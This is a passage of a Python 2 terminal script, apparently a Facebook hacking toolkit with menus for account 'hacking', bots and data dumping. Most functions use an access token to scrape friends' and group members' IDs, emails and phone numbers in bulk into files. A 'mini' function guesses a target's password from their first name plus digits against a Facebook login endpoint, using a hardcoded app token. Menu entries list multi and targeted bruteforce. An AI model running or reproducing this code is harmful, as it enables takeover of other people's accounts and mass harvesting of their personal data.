print "\033[1;94m║--\033[1;91m> \033[1;93m3.\033[1;95m Hack facebook account "
print "\033[1;94m║--\033[1;91m> \033[1;93m4.\033[1;95m Bot "
print "\033[1;94m║--\033[1;91m> \033[1;93m5.\033[1;95m Others "
print "\033[1;94m║--\033[1;91m> \033[1;93m6.\033[1;95m Show token "
print "\033[1;94m║--\033[1;91m> \033[1;93m7.\033[1;95m Delete trash "
print "\033[1;94m║--\033[1;91m> \033[1;93m8.\033[1;95m LogOut "
print "\033[1;94m║--\033[1;91m> \033[1;93m0.\033[1;95m Exit the programs "
print "║"
pilih()
#-
def pilih():
zedd = raw_input("\033[1;97m╚═\033[1;91mD \033[1;97m")
if zedd =="":
print "\033[1;91m[!] Wrong input"
pilih()
elif zedd =="1":
informasi()
elif zedd =="2":
dump()
elif zedd =="3":
menu_hack()
elif zedd =="4":
menu_bot()
elif zedd =="5":
lain()
elif zedd =="6":
os.system('reset')
print logo
toket=open('login.txt','r').read()
print "\033[1;91m[+] \033[1;92mYour token\033[1;91m :\033[1;97m "+toket
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu()
elif zedd =="7":
os.remove('out')
elif zedd =="8":
os.system('rm -rf login.txt')
os.system('xdg-open https://github.com/apaansihasw779')
keluar()
elif zedd =="0":
keluar()
else:
print "\033[1;91m[!] Wrong input"
pilih()
##### INFO #####
def informasi():
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('reset')
print logo
aid = raw_input('\033[1;91m[+] \033[1;92mEnter ID\033[1;97m/\033[1;92mName\033[1;91m : \033[1;97m')
jalan('\033[1;91m[✺] \033[1;92mWait a minute \033[1;97m...')
r = requests.get('https://graph.facebook.com/me/friends?access_token='+toket)
cok = json.loads(r.text)
for i in cok['data']:
if aid in i['name'] or aid in i['id']:
x = requests.get("https://graph.facebook.com/"+i['id']+"?access_token="+toket)
z = json.loads(x.text)
print 42*"\033[1;97m═"
try:
print '\033[1;91m[➹] \033[1;92mName\033[1;97m : '+z['name']
except KeyError: print '\033[1;91m[?] \033[1;92mName\033[1;97m : \033[1;91mNot found'
try:
print '\033[1;91m[➹] \033[1;92mID\033[1;97m : '+z['id']
except KeyError: print '\033[1;91m[?] \033[1;92mID\033[1;97m : \033[1;91mNot found'
try:
print '\033[1;91m[➹] \033[1;92mEmail\033[1;97m : '+z['email']
except KeyError: print '\033[1;91m[?] \033[1;92mEmail\033[1;97m : \033[1;91mNot found'
try:
print '\033[1;91m[➹] \033[1;92mTelephone\033[1;97m : '+z['mobile_phone']
except KeyError: print '\033[1;91m[?] \033[1;92mTelephone\033[1;97m : \033[1;91mNot found'
try:
print '\033[1;91m[➹] \033[1;92mLocation\033[1;97m : '+z['location']['name']
except KeyError: print '\033[1;91m[?] \033[1;92mLocation\033[1;97m : \033[1;91mNot found'
try:
print '\033[1;91m[➹] \033[1;92mDate of birth\033[1;97m : '+z['birthday']
except KeyError: print '\033[1;91m[?] \033[1;92mDate of birth\033[1;97m : \033[1;91mNot found'
try:
print '\033[1;91m[➹] \033[1;92mSchool\033[1;97m : '
for q in z['education']:
try:
print '\033[1;91m ~ \033[1;97m'+q['school']['name']
except KeyError: print '\033[1;91m ~ \033[1;91mNot found'
except KeyError: pass
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu()
else:
pass
else:
print"\033[1;91m[✖] User not found"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu()
##### DUMP #####
def dump():
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('reset')
print logo
print "\033[1;97m║--\033[1;91m> \033[1;92m1.\033[1;97m Get ID friend"
print "\033[1;97m║--\033[1;91m> \033[1;92m2.\033[1;97m Get ID friend from friend"
print "\033[1;97m║--\033[1;91m> \033[1;92m3.\033[1;97m Get ID Search"
print "\033[1;97m║--\033[1;91m> \033[1;92m4.\033[1;97m Get group member ID"
print "\033[1;97m║--\033[1;91m> \033[1;92m5.\033[1;97m Get group member email"
print "\033[1;97m║--\033[1;91m> \033[1;92m6.\033[1;97m Get group member phone number"
print "\033[1;97m║--\033[1;91m> \033[1;92m7.\033[1;97m Get email friend"
print "\033[1;97m║--\033[1;91m> \033[1;92m8.\033[1;97m Get email friend from friend"
print "\033[1;97m║--\033[1;91m> \033[1;92m9.\033[1;97m Get a friend's phone number"
print "\033[1;97m║--\033[1;91m> \033[1;92m10.\033[1;97m Get a friend's phone number from friend"
print "\033[1;97m║--\033[1;91m> \033[1;91m0.\033[1;97m Back"
print "║"
dump_pilih()
#-----pilih
def dump_pilih():
cuih = raw_input("\033[1;97m╚═\033[1;91mD \033[1;97m")
if cuih =="":
print "\033[1;91m[!] Wrong input"
dump_pilih()
elif cuih =="1":
id_teman()
elif cuih =="2":
idfrom_teman()
elif cuih =="3":
os.system('reset')
print "\033[1;91mSegera"
keluar()
elif cuih =="4":
id_member_grup()
elif cuih =="5":
em_member_grup()
elif cuih =="6":
no_member_grup()
elif cuih =="7":
email()
elif cuih =="8":
emailfrom_teman()
elif cuih =="9":
nomor_hp()
elif cuih =="10":
hpfrom_teman()
elif cuih =="0":
menu()
else:
print "\033[1;91m[!] Wrong input"
dump_pilih()
##### ID TEMAN #####
def id_teman():
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
try:
os.mkdir('out')
except OSError:
pass
try:
os.system('reset')
print logo
r=requests.get("https://graph.facebook.com/me/friends?access_token="+toket)
z=json.loads(r.text)
jalan('\033[1;91m[✺] \033[1;92mGet all friend id \033[1;97m...')
print 42*"\033[1;97m═"
bz = open('out/id_teman.txt','w')
for a in z['data']:
idteman.append(a['id'])
bz.write(a['id'] + '\n')
print ("\r\033[1;97m[ \033[1;92m"+str(len(idteman))+"\033[1;97m ]\033[1;97m=> \033[1;97m"+a['id']),;sys.stdout.flush();time.sleep(0.0001)
bz.close()
print '\r\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mSuccessfully get id \033[1;97m....'
print"\r\033[1;91m[+] \033[1;92mTotal ID \033[1;91m: \033[1;97m%s"%(len(idteman))
done = raw_input("\r\033[1;91m[+] \033[1;92mSave file with name\033[1;91m :\033[1;97m ")
os.rename('out/id_teman.txt','out/'+done)
print("\r\033[1;91m[+] \033[1;92mFile saved \033[1;91m: \033[1;97mout/"+done)
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except IOError:
print"\033[1;91m[!] Error creating file"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except (KeyboardInterrupt,EOFError):
print("\033[1;91m[!] Stopped")
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except KeyError:
print('\033[1;91m[!] Error')
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except requests.exceptions.ConnectionError:
print"\033[1;91m[✖] No connection"
keluar()
##### ID FROM TEMAN #####
def idfrom_teman():
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
try:
os.mkdir('out')
except OSError:
pass
try:
os.system('reset')
print logo
idt = raw_input("\033[1;91m[+] \033[1;92mInput ID friend \033[1;91m: \033[1;97m")
try:
jok = requests.get("https://graph.facebook.com/"+idt+"?access_token="+toket)
op = json.loads(jok.text)
print"\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mFrom\033[1;91m :\033[1;97m "+op["name"]
except KeyError:
print"\033[1;91m[!] Friend not found"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
r=requests.get("https://graph.facebook.com/"+idt+"?fields=friends.limit(5000)&access_token="+toket)
z=json.loads(r.text)
jalan('\033[1;91m[✺] \033[1;92mGet all friend id from friend \033[1;97m...')
print 42*"\033[1;97m═"
bz = open('out/id_teman_from_teman.txt','w')
for a in z['friends']['data']:
idfromteman.append(a['id'])
bz.write(a['id'] + '\n')
print ("\r\033[1;97m[ \033[1;92m"+str(len(idfromteman))+"\033[1;97m ]\033[1;97m=> \033[1;97m"+a['id']),;sys.stdout.flush();time.sleep(0.0001)
bz.close()
print '\r\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mSuccessfully get id \033[1;97m....'
print"\r\033[1;91m[+] \033[1;92mTotal ID \033[1;91m: \033[1;97m%s"%(len(idfromteman))
done = raw_input("\r\033[1;91m[+] \033[1;92mSave file with name\033[1;91m :\033[1;97m ")
os.rename('out/id_teman_from_teman.txt','out/'+done)
print("\r\033[1;91m[+] \033[1;92mFile saved \033[1;91m: \033[1;97mout/"+done)
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except IOError:
print"\033[1;91m[!] Error creating file"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except (KeyboardInterrupt,EOFError):
print("\033[1;91m[!] Stopped")
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except KeyError:
print('\033[1;91m[!] Error')
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except requests.exceptions.ConnectionError:
print"\033[1;91m[✖] No connection"
keluar()
##### ID FROM MEMBER GRUP #####
def id_member_grup():
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
try:
os.mkdir('out')
except OSError:
pass
try:
os.system('reset')
print logo
id=raw_input('\033[1;91m[+] \033[1;92mInput ID group \033[1;91m:\033[1;97m ')
try:
r=requests.get('https://graph.facebook.com/group/?id='+id+'&access_token='+toket)
asw=json.loads(r.text)
print"\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mFrom group \033[1;91m:\033[1;97m "+asw['name']
except KeyError:
print"\033[1;91m[!] Group not found"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
jalan('\033[1;91m[✺] \033[1;92mGet group member id \033[1;97m...')
print 42*"\033[1;97m═"
bz = open('out/member_grup.txt','w')
re=requests.get('https://graph.facebook.com/'+id+'/members?fields=name,id&limit=999999999&access_token='+toket)
s=json.loads(re.text)
for a in s['data']:
idmem.append(a['id'])
bz.write(a['id'] + '\n')
print ("\r\033[1;97m[ \033[1;92m"+str(len(idmem))+"\033[1;97m ]\033[1;97m=> \033[1;97m"+a['id']),;sys.stdout.flush();time.sleep(0.0001)
bz.close()
print '\r\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mSuccessfully get id \033[1;97m....'
print"\r\033[1;91m[+] \033[1;92mTotal ID \033[1;91m: \033[1;97m%s"%(len(idmem))
done = raw_input("\r\033[1;91m[+] \033[1;92mSave file with name\033[1;91m :\033[1;97m ")
os.rename('out/member_grup.txt','out/'+done)
print("\r\033[1;91m[+] \033[1;92mFile saved \033[1;91m: \033[1;97mout/"+done)
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except IOError:
print"\033[1;91m[!] Error creating file"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except (KeyboardInterrupt,EOFError):
print("\033[1;91m[!] Stopped")
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except KeyError:
print('\033[1;91m[!] Error')
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except requests.exceptions.ConnectionError:
print"\033[1;91m[✖] No connection"
keluar()
##### EMAIL FROM GRUP #####
def em_member_grup():
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
try:
os.mkdir('out')
except OSError:
pass
try:
os.system('reset')
print logo
id=raw_input('\033[1;91m[+] \033[1;92mInput ID group \033[1;91m:\033[1;97m ')
try:
r=requests.get('https://graph.facebook.com/group/?id='+id+'&access_token='+toket)
asw=json.loads(r.text)
print"\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mFrom group \033[1;91m:\033[1;97m "+asw['name']
except KeyError:
print"\033[1;91m[!] Group not found"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
jalan('\033[1;91m[✺] \033[1;92mGet group member email \033[1;97m...')
print 42*"\033[1;97m═"
bz = open('out/em_member_grup.txt','w')
re=requests.get('https://graph.facebook.com/'+id+'/members?fields=name,id&limit=999999999&access_token='+toket)
s=json.loads(re.text)
for a in s['data']:
x = requests.get("https://graph.facebook.com/"+a['id']+"?access_token="+toket)
z = json.loads(x.text)
try:
emmem.append(z['email'])
bz.write(z['email'] + '\n')
print ("\r\033[1;97m[ \033[1;92m"+str(len(emmem))+"\033[1;97m ]\033[1;97m=> \033[1;97m"+z['email']+" | "+z['name']+"\n"),;sys.stdout.flush();time.sleep(0.0001)
except KeyError:
pass
bz.close()
print 42*"\033[1;97m═"
print '\r\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mSuccessfully get email from member group \033[1;97m....'
print"\r\033[1;91m[+] \033[1;92mTotal Email \033[1;91m: \033[1;97m%s"%(len(emmem))
done = raw_input("\r\033[1;91m[+] \033[1;92mSave file with name\033[1;91m :\033[1;97m ")
os.rename('out/em_member_grup.txt','out/'+done)
print("\r\033[1;91m[+] \033[1;92mFile saved \033[1;91m: \033[1;97mout/"+done)
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except IOError:
print"\033[1;91m[!] Error creating file"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except (KeyboardInterrupt,EOFError):
print("\033[1;91m[!] Stopped")
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except KeyError:
print('\033[1;91m[!] Error')
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except requests.exceptions.ConnectionError:
print"\033[1;91m[✖] No connection"
keluar()
##### NOMER FROM GRUP #####
def no_member_grup():
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
try:
os.mkdir('out')
except OSError:
pass
try:
os.system('reset')
print logo
id=raw_input('\033[1;91m[+] \033[1;92mInput ID group \033[1;91m:\033[1;97m ')
try:
r=requests.get('https://graph.facebook.com/group/?id='+id+'&access_token='+toket)
asw=json.loads(r.text)
print"\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mFrom group \033[1;91m:\033[1;97m "+asw['name']
except KeyError:
print"\033[1;91m[!] Group not found"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
jalan('\033[1;91m[✺] \033[1;92mGet group member phone number \033[1;97m...')
print 42*"\033[1;97m═"
bz = open('out/no_member_grup.txt','w')
re=requests.get('https://graph.facebook.com/'+id+'/members?fields=name,id&limit=999999999&access_token='+toket)
s=json.loads(re.text)
for a in s['data']:
x = requests.get("https://graph.facebook.com/"+a['id']+"?access_token="+toket)
z = json.loads(x.text)
try:
nomem.append(z['mobile_phone'])
bz.write(z['mobile_phone'] + '\n')
print ("\r\033[1;97m[ \033[1;92m"+str(len(nomem))+"\033[1;97m ]\033[1;97m=> \033[1;97m"+z['mobile_phone']+" | "+z['name']+"\n"),;sys.stdout.flush();time.sleep(0.0001)
except KeyError:
pass
bz.close()
print 42*"\033[1;97m═"
print '\r\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mSuccessfully get phone number from member group \033[1;97m....'
print"\r\033[1;91m[+] \033[1;92mTotal Number \033[1;91m: \033[1;97m%s"%(len(nomem))
done = raw_input("\r\033[1;91m[+] \033[1;92mSave file with name\033[1;91m :\033[1;97m ")
os.rename('out/no_member_grup.txt','out/'+done)
print("\r\033[1;91m[+] \033[1;92mFile saved \033[1;91m: \033[1;97mout/"+done)
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except IOError:
print"\033[1;91m[!] Error creating file"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except (KeyboardInterrupt,EOFError):
print("\033[1;91m[!] Stopped")
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except KeyError:
print('\033[1;91m[!] Error')
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except requests.exceptions.ConnectionError:
print"\033[1;91m[✖] No connection"
keluar()
##### EMAIL #####
def email():
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
try:
os.mkdir('out')
except OSError:
pass
try:
os.system('reset')
print logo
r = requests.get('https://graph.facebook.com/me/friends?access_token='+toket)
a = json.loads(r.text)
jalan('\033[1;91m[✺] \033[1;92mGet all friend email \033[1;97m...')
print 42*"\033[1;97m═"
bz = open('out/email_teman.txt','w')
for i in a['data']:
x = requests.get("https://graph.facebook.com/"+i['id']+"?access_token="+toket)
z = json.loads(x.text)
try:
em.append(z['email'])
bz.write(z['email'] + '\n')
print ("\r\033[1;97m[ \033[1;92m"+str(len(em))+"\033[1;97m ]\033[1;97m=> \033[1;97m"+z['email']+" | "+z['name']+"\n"),;sys.stdout.flush();time.sleep(0.0001)
except KeyError:
pass
bz.close()
print 42*"\033[1;97m═"
print '\r\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mSuccessfully get email \033[1;97m....'
print"\r\033[1;91m[+] \033[1;92mTotal Email \033[1;91m: \033[1;97m%s"%(len(em))
done = raw_input("\r\033[1;91m[+] \033[1;92mSave file with name\033[1;91m :\033[1;97m ")
os.rename('out/email_teman.txt','out/'+done)
print("\r\033[1;91m[+] \033[1;92mFile saved \033[1;91m: \033[1;97mout/"+done)
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except IOError:
print"\033[1;91m[!] Error creating file"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except (KeyboardInterrupt,EOFError):
print("\033[1;91m[!] Stopped")
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except KeyError:
print('\033[1;91m[!] Error')
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except requests.exceptions.ConnectionError:
print"\033[1;91m[✖] No connection"
keluar()
##### EMAIL FROM TEMAN #####
def emailfrom_teman():
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
try:
os.mkdir('out')
except OSError:
pass
try:
os.system('reset')
print logo
idt = raw_input("\033[1;91m[+] \033[1;92mInput ID friend \033[1;91m: \033[1;97m")
try:
jok = requests.get("https://graph.facebook.com/"+idt+"?access_token="+toket)
op = json.loads(jok.text)
print"\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mFrom\033[1;91m :\033[1;97m "+op["name"]
except KeyError:
print"\033[1;91m[!] Friend not found"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
r = requests.get('https://graph.facebook.com/'+idt+'/friends?access_token='+toket)
a = json.loads(r.text)
jalan('\033[1;91m[✺] \033[1;92mGet all friend email from friend \033[1;97m...')
print 42*"\033[1;97m═"
bz = open('out/em_teman_from_teman.txt','w')
for i in a['data']:
x = requests.get("https://graph.facebook.com/"+i['id']+"?access_token="+toket)
z = json.loads(x.text)
try:
emfromteman.append(z['email'])
bz.write(z['email'] + '\n')
print ("\r\033[1;97m[ \033[1;92m"+str(len(emfromteman))+"\033[1;97m ]\033[1;97m=> \033[1;97m"+z['email']+" | "+z['name']+"\n"),;sys.stdout.flush();time.sleep(0.0001)
except KeyError:
pass
bz.close()
print 42*"\033[1;97m═"
print '\r\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mSuccessfully get email \033[1;97m....'
print"\r\033[1;91m[+] \033[1;92mTotal Email \033[1;91m: \033[1;97m%s"%(len(emfromteman))
done = raw_input("\r\033[1;91m[+] \033[1;92mSave file with name\033[1;91m :\033[1;97m ")
os.rename('out/em_teman_from_teman.txt','out/'+done)
print("\r\033[1;91m[+] \033[1;92mFile saved \033[1;91m: \033[1;97mout/"+done)
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except IOError:
print"\033[1;91m[!] Error creating file"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except (KeyboardInterrupt,EOFError):
print("\033[1;91m[!] Stopped")
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except KeyError:
print('\033[1;91m[!] Error')
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except requests.exceptions.ConnectionError:
print"\033[1;91m[✖] No connection"
keluar()
##### NOMER #####
def nomor_hp():
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
try:
os.mkdir('out')
except OSError:
pass
try:
os.system('reset')
print logo
jalan('\033[1;91m[✺] \033[1;92mGet all friend number phone \033[1;97m...')
print 42*"\033[1;97m═"
url= "https://graph.facebook.com/me/friends?access_token="+toket
r =requests.get(url)
z=json.loads(r.text)
bz = open('out/nomer_teman.txt','w')
for n in z["data"]:
x = requests.get("https://graph.facebook.com/"+n['id']+"?access_token="+toket)
z = json.loads(x.text)
try:
hp.append(z['mobile_phone'])
bz.write(z['mobile_phone'] + '\n')
print ("\r\033[1;97m[ \033[1;92m"+str(len(hp))+"\033[1;97m ]\033[1;97m=> \033[1;97m"+z['mobile_phone']+" | "+z['name']+"\n"),;sys.stdout.flush();time.sleep(0.0001)
except KeyError:
pass
bz.close()
print 42*"\033[1;97m═"
print '\r\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mSuccessfully get number \033[1;97m....'
print"\r\033[1;91m[+] \033[1;92mTotal Number \033[1;91m: \033[1;97m%s"%(len(hp))
done = raw_input("\r\033[1;91m[+] \033[1;92mSave file with name\033[1;91m :\033[1;97m ")
os.rename('out/nomer_teman.txt','out/'+done)
print("\r\033[1;91m[+] \033[1;92mFile saved \033[1;91m: \033[1;97mout/"+done)
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except IOError:
print"\033[1;91m[!] Error creating file"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except (KeyboardInterrupt,EOFError):
print("\033[1;91m[!] Stopped")
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except KeyError:
print('\033[1;91m[!] Error')
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except requests.exceptions.ConnectionError:
print"\033[1;91m[✖] No connection"
keluar()
##### NOMER FROM TEMAN #####
def hpfrom_teman():
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
try:
os.mkdir('out')
except OSError:
pass
try:
os.system('reset')
print logo
idt = raw_input("\033[1;91m[+] \033[1;92mInput ID friend \033[1;91m: \033[1;97m")
try:
jok = requests.get("https://graph.facebook.com/"+idt+"?access_token="+toket)
op = json.loads(jok.text)
print"\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mFrom\033[1;91m :\033[1;97m "+op["name"]
except KeyError:
print"\033[1;91m[!] Friend not found"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
r = requests.get('https://graph.facebook.com/'+idt+'/friends?access_token='+toket)
a = json.loads(r.text)
jalan('\033[1;91m[✺] \033[1;92mGet all friend number from friend \033[1;97m...')
print 42*"\033[1;97m═"
bz = open('out/no_teman_from_teman.txt','w')
for i in a['data']:
x = requests.get("https://graph.facebook.com/"+i['id']+"?access_token="+toket)
z = json.loads(x.text)
try:
hpfromteman.append(z['mobile_phone'])
bz.write(z['mobile_phone'] + '\n')
print ("\r\033[1;97m[ \033[1;92m"+str(len(hpfromteman))+"\033[1;97m ]\033[1;97m=> \033[1;97m"+z['mobile_phone']+" | "+z['name']+"\n"),;sys.stdout.flush();time.sleep(0.0001)
except KeyError:
pass
bz.close()
print 42*"\033[1;97m═"
print '\r\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mSuccessfully get number \033[1;97m....'
print"\r\033[1;91m[+] \033[1;92mTotal Number \033[1;91m: \033[1;97m%s"%(len(hpfromteman))
done = raw_input("\r\033[1;91m[+] \033[1;92mSave file with name\033[1;91m :\033[1;97m ")
os.rename('out/no_teman_from_teman.txt','out/'+done)
print("\r\033[1;91m[+] \033[1;92mFile saved \033[1;91m: \033[1;97mout/"+done)
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except IOError:
print"\033[1;91m[!] Error creating file"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except (KeyboardInterrupt,EOFError):
print("\033[1;91m[!] Stopped")
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except KeyError:
print('\033[1;91m[!] Error')
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except requests.exceptions.ConnectionError:
print"\033[1;91m[✖] No connection"
keluar()
##### MENU HACK #####
def menu_hack():
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('reset')
print logo
print "\033[1;93m║--\033[1;93m> \033[1;93m1.\033[1;94m Mini Hack Facebook(\033[1;92mTarget\033[1;97m)"
print "\033[1;93m║--\033[1;93m> \033[1;93m2.\033[1;94m Multi Bruteforce Facebook"
print "\033[1;93m║--\033[1;93m> \033[1;93m3.\033[1;94m Super Multi Bruteforce Facebook"
print "\033[1;93m║--\033[1;93m> \033[1;93m4.\033[1;94m BruteForce(\033[1;92mTarget\033[1;97m)"
print "\033[1;93m║--\033[1;93m> \033[1;93m5.\033[1;94m Yahoo Checker"
print "\033[1;93m║--\033[1;93m> \033[1;93m0.\033[1;94m Back"
print "║"
hack_pilih()
#----pilih
def hack_pilih():
hack = raw_input("\033[1;95m╚═\033[1;95mD \033[1;95m")
if hack=="":
print "\033[1;91m[!] Wrong input"
hack_pilih()
elif hack =="1":
mini()
elif hack =="2":
crack()
hasil()
elif hack =="3":
super()
elif hack =="4":
brute()
elif hack =="5":
menu_yahoo()
elif hack =="0":
menu()
else:
print "\033[1;91m[!] Wrong input"
hack_pilih()
##### MINI HF #####
def mini():
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('reset')
print logo
print "\033[1;97m[\033[1;91mINFO\033[1;97m] \033[1;91mThe target account must be friends\n with your account first!"
print 42*"\033[1;97m═"
try:
id = raw_input("\033[1;91m[+] \033[1;92mTarget ID \033[1;91m:\033[1;97m ")
jalan('\033[1;91m[✺] \033[1;92mWait a minute \033[1;97m...')
r = requests.get("https://graph.facebook.com/"+id+"?access_token="+toket)
a = json.loads(r.text)
print '\033[1;91m[➹] \033[1;92mName\033[1;97m : '+a['name']
jalan('\033[1;91m[+] \033[1;92mCheck \033[1;97m...')
time.sleep(2)
jalan('\033[1;91m[+] \033[1;92mOpen password \033[1;97m...')
time.sleep(2)
print 42*"\033[1;97m═"
pz1 = a['first_name']+'123'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(id)+"&locale=en_US&password="+(pz1)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
y = json.load(data)
if 'access_token' in y:
print "\033[1;91m[+] \033[1;92mFound"
print "\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mName\033[1;97m : "+a['name']
print "\033[1;91m[➹] \033[1;92mUsername\033[1;97m : "+id
print "\033[1;91m[➹] \033[1;92mPassword\033[1;97m : "+pz1
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_hack()
else:
if 'www.facebook.com' in y["error_msg"]:
print "\033[1;91m[+] \033[1;92mFound"
print "\033[1;91m[!] \033[1;93mAccount Checkpoint"
print "\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mName\033[1;97m : "+a['name']
print "\033[1;91m[➹] \033[1;92mUsername\033[1;97m : "+id
print "\033[1;91m[➹] \033[1;92mPassword\033[1;97m : "+pz1
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_hack()
else:
pz2 = a['first_name'] + '12345'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(id)+"&locale=en_US&password="+(pz2)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
y = json.load(data)
if 'access_token' in y:
print "\033[1;91m[+] \033[1;92mFound"
print "\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mName\033[1;97m : "+a['name']
print "\033[1;91m[➹] \033[1;92mUsername\033[1;97m : "+id
print "\033[1;91m[➹] \033[1;92mPassword\033[1;97m : "+pz2
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_hack()
else:
if 'www.facebook.com' in y["error_msg"]:
print "\033[1;91m[+] \033[1;92mFound"
print "\033[1;91m[!] \033[1;93mAccount Checkpoint"
print "\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mName\033[1;97m : "+a['name']
